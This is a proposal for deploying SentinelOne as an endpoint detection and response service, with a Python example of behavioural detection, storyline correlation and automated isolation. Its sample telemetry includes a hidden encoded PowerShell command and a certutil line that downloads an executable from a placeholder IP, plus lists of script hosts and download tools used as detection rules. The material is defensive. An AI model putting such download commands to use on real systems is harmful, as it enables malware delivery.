SentinelOne
Endpoint Detection and Response
Background
Endpoint Detection and Response (EDR) is a proposed cyber security service from Road Map Technologies that monitors, detects, and responds to threats on endpoint devices such as workstations, mobile devices, and servers. EDR provides real-time visibility into endpoint activity and protection against malicious software.
Goal: To protect an organization’s endpoint devices from cyber threats through continuous monitoring, threat detection, and incident response.
Implement an EDR solution to:
- Collect endpoint data such as system processes, file activities, network connections and user actions.
- Detect threats by analyzing collected data for suspicious behavior.
- Provide real-time visibility into endpoint activity so security teams can track and investigate incidents as they happen.
- Respond with a combination of automated and manual incident response.
- Be proactive: use threat-hunting features to find threats and indicators of compromise that the tool's automated detections do not yet cover.
Service Summary
Road Map Technologies will deploy SentinelOne Complete as its EDR solution. SentinelOne Complete delivers AI-driven threat prevention, detection, and automated response across workstations and servers.
Key Features:
- AI-powered threat prevention: Uses machine learning and behavioral analysis to provide real-time protection against threats.
- Active EDR: Continuously monitors endpoint activity and automatically correlates related events into attack storylines.
- Automated response: Autonomous remediation that can mitigate threats, isolate infected hosts, and restore compromised devices without analyst intervention.
- Deep visibility: Comprehensive visibility into endpoint activity, allowing analysts to hunt for threats (proactively) and respond to incidents (reactively).
- Cloud-based: A cloud-native solution.
- Lightweight agent: The required agent has a minimal footprint and low resource consumption.
- Integrations: Supports API integrations to connect it with existing security infrastructure.
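The collect/detect/correlate/respond steps listed under "Implement an EDR solution to" and the Active EDR storyline and automated-response features above can be shown end to end on a toy process-telemetry pipeline. The following is an added example, not SentinelOne's or Road Map Technologies' code: the process events, rule names, severity levels and response actions are all constructed for illustration, and the telemetry is a made-up macro-document-to-PowerShell-to-certutil chain rather than real logs.

```python
from dataclasses import dataclass
from typing import Dict, List

@dataclass(frozen=True)
class ProcessEvent:
    ts: int        # event time in seconds (constructed)
    host: str
    pid: int
    ppid: int
    image: str     # executable name, lower-case
    cmdline: str
    user: str

# Constructed telemetry for one workstation (not real logs): a macro document
# launches encoded PowerShell, which uses certutil to fetch a payload.
TELEMETRY: List[ProcessEvent] = [
    ProcessEvent(100, "WS-01", 400, 1, "explorer.exe", "explorer.exe", "alice"),
    ProcessEvent(101, "WS-01", 520, 400, "outlook.exe", "outlook.exe", "alice"),
    ProcessEvent(130, "WS-01", 610, 520, "winword.exe", 'winword.exe "invoice.docm"', "alice"),
    ProcessEvent(131, "WS-01", 700, 610, "powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA", "alice"),
    ProcessEvent(132, "WS-01", 710, 700, "certutil.exe",
                 "certutil.exe -urlcache -split -f http://198.51.100.7/a.exe a.exe", "alice"),
    ProcessEvent(140, "WS-01", 800, 400, "chrome.exe", "chrome.exe", "alice"),
]

# Hypothetical rule inputs; a real EDR ships far larger lists.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_LOLBINS = {"certutil.exe", "bitsadmin.exe"}

@dataclass(frozen=True)
class Detection:
    rule: str
    severity: str
    event: ProcessEvent

def _encoded_powershell(cmdline: str) -> bool:
    # PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
    toks = [t.lower() for t in cmdline.split()]
    return any(t in ("-e", "-ec") or t.startswith("-enc") for t in toks)

def detect(events: List[ProcessEvent]) -> List[Detection]:
    """Behavioural rules over process-creation events (the 'detect' step)."""
    by_pid: Dict[int, ProcessEvent] = {e.pid: e for e in events}
    hits: List[Detection] = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent and parent.image in OFFICE_APPS and e.image in SCRIPT_HOSTS:
            hits.append(Detection("office_app_spawns_script_host", "high", e))
        if e.image in ("powershell.exe", "pwsh.exe") and _encoded_powershell(e.cmdline):
            hits.append(Detection("encoded_powershell_command", "medium", e))
        if e.image in DOWNLOAD_LOLBINS and "http" in e.cmdline.lower():
            hits.append(Detection("lolbin_download", "high", e))
    return hits

def storyline(events: List[ProcessEvent], pid: int) -> List[ProcessEvent]:
    """Correlate a flagged process with its ancestors and descendants (the 'storyline')."""
    by_pid = {e.pid: e for e in events}
    chain: List[ProcessEvent] = []
    seen = set()
    cur = by_pid.get(pid)
    while cur is not None and cur.pid not in seen:   # walk up to the root of the tree
        seen.add(cur.pid)
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    frontier = [pid]
    while frontier:                                  # walk down over every descendant
        p = frontier.pop()
        for child in (e for e in events if e.ppid == p and e.pid not in seen):
            seen.add(child.pid)
            chain.append(child)
            frontier.append(child.pid)
    return sorted(chain, key=lambda e: e.ts)

def respond(detections: List[Detection]) -> Dict[str, str]:
    """Automated action per host: isolate on any high-severity hit, otherwise alert an analyst."""
    actions: Dict[str, str] = {}
    for d in detections:
        if d.severity == "high":
            actions[d.event.host] = "isolate_host"
        else:
            actions.setdefault(d.event.host, "alert_analyst")
    return actions

if __name__ == "__main__":
    hits = detect(TELEMETRY)
    for h in hits:
        print(f"{h.severity:6} {h.rule:32} pid={h.event.pid} {h.event.cmdline}")
    for e in storyline(TELEMETRY, hits[0].event.pid):
        print(f"  t={e.ts} pid={e.pid} ppid={e.ppid} {e.image}")
    print(respond(hits))
```

The storyline walk is what turns three separate rule hits into one incident: it pulls in the benign-looking Outlook and Word ancestors that explain how PowerShell came to run, while leaving the unrelated Chrome process out. The response step is intentionally coarse; in practice the isolate decision would also weigh host criticality and whether the hit was already blocked.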
Objectives
- Real-time Visibility
- Threat Detection
- Incident Response
- Threat Hunting
- Integration with existing infrastructure
- Reduce dwell time
- Improve Security Posture